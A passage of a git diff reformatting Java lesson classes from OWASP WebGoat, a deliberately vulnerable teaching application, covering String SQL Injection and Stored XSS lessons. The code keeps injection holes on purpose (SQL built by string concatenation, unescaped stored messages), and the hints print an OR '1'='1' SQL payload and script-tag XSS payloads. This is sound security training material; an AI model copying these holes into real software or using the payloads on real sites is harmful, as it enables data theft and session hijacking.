+	protected Element createContent(WebSession s)
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		return super.createStagedContent(s);
+	}
 
-	    ec.addElement(makeAccountLine(s));
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		return injectableQuery(s);
+	}
 
-	    String query = "SELECT * FROM user_data WHERE last_name = '"
-		    + accountName + "'";
-	    ec.addElement(new PRE(query));
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		return parameterizedQuery(s);
+	}
 
-	    try
-	    {
-		Statement statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		ResultSet results = statement.executeQuery(query);
+	protected Element injectableQuery(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-		if ((results != null) && (results.first() == true))
+		try
 		{
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		    results.last();
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-		    // If they get back more than one user they succeeded
-		    if (results.getRow() >= 6)
-		    {
-			makeSuccess(s);
-			getLessonTracker(s).setStage(2);
+			ec.addElement(makeAccountLine(s));
 
-			StringBuffer msg = new StringBuffer();
+			String query = "SELECT * FROM user_data WHERE last_name = '" + accountName + "'";
+			ec.addElement(new PRE(query));
 
-			msg.append("Bet you can't do it again! ");
-			msg
-				.append("This lesson has detected your successfull attack ");
-			msg.append("and has now switched to a defensive mode. ");
-			msg
-				.append("Try again to attack a parameterized query.");
+			try
+			{
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(query);
 
-			s.setMessage(msg.toString());
-		    }
-		}
-		else
+				if ((results != null) && (results.first() == true))
+				{
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+
+					// If they get back more than one user they succeeded
+					if (results.getRow() >= 6)
+					{
+						makeSuccess(s);
+						getLessonTracker(s).setStage(2);
+
+						StringBuffer msg = new StringBuffer();
+
+						msg.append("Bet you can't do it again! ");
+						msg.append("This lesson has detected your successfull attack ");
+						msg.append("and has now switched to a defensive mode. ");
+						msg.append("Try again to attack a parameterized query.");
+
+						s.setMessage(msg.toString());
+					}
+				}
+				else
+				{
+					ec.addElement("No results matched.  Try Again.");
+				}
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement(sqle.getMessage()));
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    ec.addElement("No results matched.  Try Again.");
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement(sqle.getMessage()));
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+
+		return (ec);
 	}
 
-	return (ec);
-    }
-
-
-    protected Element parameterizedQuery(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec
-		.addElement("Now that you have successfully performed an SQL injection, try the same "
-			+ " type of attack on a parameterized query.  Restart the lesson if you wish "
-			+ " to return to the injectable query");
-	if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals(
-		"restart"))
+	protected Element parameterizedQuery(WebSession s)
 	{
-	    getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
-	    return (injectableQuery(s));
-	}
+		ElementContainer ec = new ElementContainer();
 
-	ec.addElement(new BR());
-
-	try
-	{
-		Connection connection = DatabaseUtilities.getConnection(s);
-
-	    ec.addElement(makeAccountLine(s));
-
-	    String query = "SELECT * FROM user_data WHERE last_name = ?";
-	    ec.addElement(new PRE(query));
-
-	    try
-	    {
-		PreparedStatement statement = connection.prepareStatement(
-			query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		statement.setString(1, accountName);
-		ResultSet results = statement.executeQuery();
-
-		if ((results != null) && (results.first() == true))
+		ec.addElement("Now that you have successfully performed an SQL injection, try the same "
+				+ " type of attack on a parameterized query.  Restart the lesson if you wish "
+				+ " to return to the injectable query");
+		if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
 		{
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		    results.last();
-
-		    // If they get back more than one user they succeeded
-		    if (results.getRow() >= 6)
-		    {
-			makeSuccess(s);
-		    }
+			getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
+			return (injectableQuery(s));
 		}
-		else
+
+		ec.addElement(new BR());
+
+		try
 		{
-		    ec.addElement("No results matched.  Try Again.");
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			ec.addElement(makeAccountLine(s));
+
+			String query = "SELECT * FROM user_data WHERE last_name = ?";
+			ec.addElement(new PRE(query));
+
+			try
+			{
+				PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																			ResultSet.CONCUR_READ_ONLY);
+				statement.setString(1, accountName);
+				ResultSet results = statement.executeQuery();
+
+				if ((results != null) && (results.first() == true))
+				{
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+
+					// If they get back more than one user they succeeded
+					if (results.getRow() >= 6)
+					{
+						makeSuccess(s);
+					}
+				}
+				else
+				{
+					ec.addElement("No results matched.  Try Again.");
+				}
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement(sqle.getMessage()));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement(sqle.getMessage()));
-	    }
+
+		return (ec);
 	}
-	catch (Exception e)
+
+	protected Element makeAccountLine(WebSession s)
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new P().addElement("Enter your last name: "));
+
+		accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
+		Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
+		ec.addElement(input);
+
+		Element b = ECSFactory.makeButton("Go!");
+		ec.addElement(b);
+
+		return ec;
+
 	}
 
-	return (ec);
-    }
-
-
-    protected Element makeAccountLine(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(new P().addElement("Enter your last name: "));
-
-	accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
-	Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
-	ec.addElement(input);
-
-	Element b = ECSFactory.makeButton("Go!");
-	ec.addElement(b);
-
-	return ec;
-
-    }
-
-
-    /**
-     *  Gets the category attribute of the SqNumericInjection object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the DatabaseFieldScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
-	hints
-		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-			+ "\"SELECT * FROM user_data WHERE last_name = \" + accountName ");
-	hints
-		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR."
-			+ "Try appending a SQL statement that always resolves to true");
-	hints.add("Try entering [ smith' OR '1' = '1 ].");
-
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(75);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the DatabaseFieldScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("String SQL Injection");
-    }
-
-
-    /**
-     *  Constructor for the DatabaseFieldScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-	try
+	/**
+	 * Gets the category attribute of the SqNumericInjection object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    super.handleRequest(s);
+		return Category.INJECTION;
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the hints attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
 	{
-	    System.out.println("Exception caught: " + e);
-	    e.printStackTrace(System.out);
+		List<String> hints = new ArrayList<String>();
+		hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+		hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+				+ "\"SELECT * FROM user_data WHERE last_name = \" + accountName ");
+		hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR."
+				+ "Try appending a SQL statement that always resolves to true");
+		hints.add("Try entering [ smith' OR '1' = '1 ].");
+
+		return hints;
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(75);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("String SQL Injection");
+	}
+
+	/**
+	 * Constructor for the DatabaseFieldScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void handleRequest(WebSession s)
+	{
+		try
+		{
+			super.handleRequest(s);
+		} catch (Exception e)
+		{
+			System.out.println("Exception caught: " + e);
+			e.printStackTrace(System.out);
+		}
 	}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
index e67d3447c..0806da40c 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -23,358 +24,342 @@ import org.apache.ecs.html.TextArea;
 import org.owasp.webgoat.session.*;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class StoredXss extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    private final static String MESSAGE = "message";
+	private final static String MESSAGE = "message";
 
-    private final static int MESSAGE_COL = 3;
+	private final static int MESSAGE_COL = 3;
 
-    private final static String NUMBER = "Num";
+	private final static String NUMBER = "Num";
 
-    private final static int NUM_COL = 1;
+	private final static int NUM_COL = 1;
 
-    private final static String STANDARD_QUERY = "SELECT * FROM messages";
+	private final static String STANDARD_QUERY = "SELECT * FROM messages";
 
-    private final static String TITLE = "title";
+	private final static String TITLE = "title";
 
-    private final static int TITLE_COL = 2;
+	private final static int TITLE_COL = 2;
 
-    private static int count = 1;
+	private static int count = 1;
 
-    private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted message
+	private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
+											// message
 
-
-    /**
-     *  Adds a feature to the Message attribute of the MessageBoardScreen object
-     *
-     * @param  s  The feature to be added to the Message attribute
-     */
-    protected void addMessage(WebSession s)
-    {
-	try
+	/**
+	 * Adds a feature to the Message attribute of the MessageBoardScreen object
+	 * 
+	 * @param s
+	 *            The feature to be added to the Message attribute
+	 */
+	protected void addMessage(WebSession s)
 	{
-	    String title = HtmlEncoder.encode(s.getParser().getRawParameter(
-		    TITLE, ""));
-	    String message = s.getParser().getRawParameter(MESSAGE, "");
+		try
+		{
+			String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
+			String message = s.getParser().getRawParameter(MESSAGE, "");
 
-		Connection connection = DatabaseUtilities.getConnection(s);
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-	    String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
+			String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
 
-	    PreparedStatement statement = connection.prepareStatement(query,
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    statement.setInt(1, count++);
-	    statement.setString(2, title);
-	    statement.setString(3, message);
-	    statement.setString(4, s.getUserName());
-	    statement.execute();
+			PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
+			statement.setInt(1, count++);
+			statement.setString(2, title);
+			statement.setString(3, message);
+			statement.setString(4, s.getUserName());
+			statement.execute();
+		} catch (Exception e)
+		{
+			// ignore the empty resultset on the insert. There are a few more SQL Injection errors
+			// that could be trapped here but we will let them try. One error would be something
+			// like "Characters found after end of SQL statement."
+			if (e.getMessage().indexOf("No ResultSet was produced") == -1)
+			{
+				s.setMessage("Could not add message to database");
+			}
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    // ignore the empty resultset on the insert.  There are a few more SQL Injection errors
-	    // that could be trapped here but we will let them try.  One error would be something
-	    // like "Characters found after end of SQL statement." 
-	    if (e.getMessage().indexOf("No ResultSet was produced") == -1)
-	    {
-		s.setMessage("Could not add message to database");
-	    }
-	    e.printStackTrace();
+		addMessage(s);
+
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(makeInput(s));
+		ec.addElement(new HR());
+		ec.addElement(makeCurrent(s));
+		ec.addElement(new HR());
+		ec.addElement(makeList(s));
+
+		return (ec);
 	}
-    }
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	addMessage(s);
-
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(makeInput(s));
-	ec.addElement(new HR());
-	ec.addElement(makeCurrent(s));
-	ec.addElement(new HR());
-	ec.addElement(makeList(s));
-
-	return (ec);
-    }
-
-
-    /**
-     *  Gets the category attribute of the StoredXss object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the MessageBoardScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("You can put HTML tags in your message.");
-	hints
-		.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
-	hints
-		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in the message field.");
-	hints
-		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in the message field.");
-
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the MessageBoardScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Stored XSS Attacks");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeCurrent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Gets the category attribute of the StoredXss object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+		return Category.XSS;
+	}
 
-		Connection connection = DatabaseUtilities.getConnection(s);
+	/**
+	 * Gets the hints attribute of the MessageBoardScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("You can put HTML tags in your message.");
+		hints.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
+		hints
+				.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in the message field.");
+		hints.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in the message field.");
 
-	    // edit by Chuck Willis - Added logic to associate similar usernames
-	    // The idea is that users chuck-1, chuck-2, etc will see each other's messages
-	    // but not anyone elses.  This allows users to try out XSS to grab another user's
-	    // cookies, but not get confused by other users scripts
+		return hints;
+	}
 
-	    String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
-	    PreparedStatement statement = connection.prepareStatement(query,
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    statement.setString(1, getNameroot(s.getUserName()) + "%");
-	    statement.setInt(2, messageNum);
-	    ResultSet results = statement.executeQuery();
+	private final static Integer DEFAULT_RANKING = new Integer(100);
 
-	    if ((results != null) && results.first())
-	    {
-		ec.addElement(new H1("Message Contents For: "
-			+ results.getString(TITLE_COL)));
-		Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
-			.setBorder(0);
-		TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
-		row1.addElement(new TD(new StringElement(results
-			.getString(TITLE_COL))));
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the MessageBoardScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Stored XSS Attacks");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeCurrent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			// edit by Chuck Willis - Added logic to associate similar usernames
+			// The idea is that users chuck-1, chuck-2, etc will see each other's messages
+			// but not anyone elses. This allows users to try out XSS to grab another user's
+			// cookies, but not get confused by other users scripts
+
+			String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
+			PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
+			statement.setString(1, getNameroot(s.getUserName()) + "%");
+			statement.setInt(2, messageNum);
+			ResultSet results = statement.executeQuery();
+
+			if ((results != null) && results.first())
+			{
+				ec.addElement(new H1("Message Contents For: " + results.getString(TITLE_COL)));
+				Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+				TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
+				row1.addElement(new TD(new StringElement(results.getString(TITLE_COL))));
+				t.addElement(row1);
+
+				String messageData = results.getString(MESSAGE_COL);
+				TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
+				row2.addElement(new TD(new StringElement(messageData)));
+				t.addElement(row2);
+
+				// Edited by Chuck Willis - added display of the user who posted the message, so
+				// that
+				// if users use a cross site request forgery or XSS to make another user post a
+				// message,
+				// they can see that the message is attributed to that user
+
+				TR row3 = new TR(new TD(new StringElement("Posted By:")));
+				row3.addElement(new TD(new StringElement(results.getString(USER_COL))));
+				t.addElement(row3);
+
+				ec.addElement(t);
+
+				// Some sanity checks that the script may be correct
+				if (messageData.toLowerCase().indexOf("<script>") != -1
+						&& messageData.toLowerCase().indexOf("</script>") != -1
+						&& messageData.toLowerCase().indexOf("alert") != -1)
+				{
+					makeSuccess(s);
+				}
+
+			}
+			else
+			{
+				if (messageNum != 0)
+				{
+					ec.addElement(new P().addElement("Could not find message " + messageNum));
+				}
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeInput(WebSession s)
+	{
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new StringElement("Title: ")));
+
+		Input inputTitle = new Input(Input.TEXT, TITLE, "");
+		row1.addElement(new TD(inputTitle));
+
+		TD item1 = new TD();
+		item1.setVAlign("TOP");
+		item1.addElement(new StringElement("Message: "));
+		row2.addElement(item1);
+
+		TD item2 = new TD();
+		TextArea ta = new TextArea(MESSAGE, 5, 60);
+		item2.addElement(ta);
+		row2.addElement(item2);
 		t.addElement(row1);
-
-		String messageData = results.getString(MESSAGE_COL);
-		TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
-		row2.addElement(new TD(new StringElement(messageData)));
 		t.addElement(row2);
 
-		// Edited by Chuck Willis - added display of the user who posted the message, so that
-		// if users use a cross site request forgery or XSS to make another user post a message,
-		// they can see that the message is attributed to that user
+		Element b = ECSFactory.makeButton("Submit");
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(t);
+		ec.addElement(new P().addElement(b));
 
-		TR row3 = new TR(new TD(new StringElement("Posted By:")));
-		row3.addElement(new TD(new StringElement(results
-			.getString(USER_COL))));
-		t.addElement(row3);
+		return (ec);
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static Element makeList(WebSession s)
+	{
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																ResultSet.CONCUR_READ_ONLY);
+			// edit by Chuck Willis - Added logic to associate similar usernames
+			// The idea is that users chuck-1, chuck-2, etc will see each other's messages
+			// but not anyone elses. This allows users to try out XSS to grab another user's
+			// cookies, but not get confused by other users scripts
+
+			ResultSet results = statement.executeQuery(STANDARD_QUERY + " WHERE user_name LIKE '"
+					+ getNameroot(s.getUserName()) + "%'");
+
+			if ((results != null) && (results.first() == true))
+			{
+				results.beforeFirst();
+
+				for (int i = 0; results.next(); i++)
+				{
+					A a = ECSFactory.makeLink(results.getString(TITLE_COL), NUMBER, results.getInt(NUM_COL));
+					TD td = new TD().addElement(a);
+					TR tr = new TR().addElement(td);
+					t.addElement(tr);
+				}
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error while getting message list.");
+		}
+
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new H1("Message List"));
 		ec.addElement(t);
 
-		// Some sanity checks that the script may be correct
-		if (messageData.toLowerCase().indexOf("<script>") != -1
-			&& messageData.toLowerCase().indexOf("</script>") != -1
-			&& messageData.toLowerCase().indexOf("alert") != -1)
+		return (ec);
+	}
+
+	private static String getNameroot(String name)
+	{
+		String nameroot = name;
+		if (nameroot.indexOf('-') != -1)
 		{
-		    makeSuccess(s);
+			nameroot = nameroot.substring(0, nameroot.indexOf('-'));
 		}
-
-	    }
-	    else
-	    {
-		if (messageNum != 0)
-		{
-		    ec.addElement(new P().addElement("Could not find message "
-			    + messageNum));
-		}
-	    }
+		return nameroot;
 	}
-	catch (Exception e)
+
+	public Element getCredits()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return super.getCustomCredits("", ASPECT_LOGO);
 	}
-
-	return (ec);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeInput(WebSession s)
-    {
-	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-	TR row1 = new TR();
-	TR row2 = new TR();
-	row1.addElement(new TD(new StringElement("Title: ")));
-
-	Input inputTitle = new Input(Input.TEXT, TITLE, "");
-	row1.addElement(new TD(inputTitle));
-
-	TD item1 = new TD();
-	item1.setVAlign("TOP");
-	item1.addElement(new StringElement("Message: "));
-	row2.addElement(item1);
-
-	TD item2 = new TD();
-	TextArea ta = new TextArea(MESSAGE, 5, 60);
-	item2.addElement(ta);
-	row2.addElement(item2);
-	t.addElement(row1);
-	t.addElement(row2);
-
-	Element b = ECSFactory.makeButton("Submit");
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(t);
-	ec.addElement(new P().addElement(b));
-
-	return (ec);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    public static Element makeList(WebSession s)
-    {
-	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
-	try
-	{
-		Connection connection = DatabaseUtilities.getConnection(s);
-
-	    Statement statement = connection.createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    // edit by Chuck Willis - Added logic to associate similar usernames
-	    // The idea is that users chuck-1, chuck-2, etc will see each other's messages
-	    // but not anyone elses.  This allows users to try out XSS to grab another user's
-	    // cookies, but not get confused by other users scripts
-
-	    ResultSet results = statement.executeQuery(STANDARD_QUERY
-		    + " WHERE user_name LIKE '" + getNameroot(s.getUserName())
-		    + "%'");
-
-	    if ((results != null) && (results.first() == true))
-	    {
-		results.beforeFirst();
-
-		for (int i = 0; results.next(); i++)
-		{
-		    A a = ECSFactory.makeLink(results.getString(TITLE_COL),
-			    NUMBER, results.getInt(NUM_COL));
-		    TD td = new TD().addElement(a);
-		    TR tr = new TR().addElement(td);
-		    t.addElement(tr);
-		}
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error while getting message list.");
-	}
-
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(new H1("Message List"));
-	ec.addElement(t);
-
-	return (ec);
-    }
-
-
-    private static String getNameroot(String name)
-    {
-	String nameroot = name;
-	if (nameroot.indexOf('-') != -1)
-	{
-	    nameroot = nameroot.substring(0, nameroot.indexOf('-'));
-	}
-	return nameroot;
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
index 6c1723d2e..01d77415d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -13,203 +14,188 @@ import org.apache.ecs.html.IMG;
 import org.apache.ecs.html.Input;
 import org.apache.ecs.html.P;
 import org.apache.ecs.html.A;
-
 import org.owasp.webgoat.session.*;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
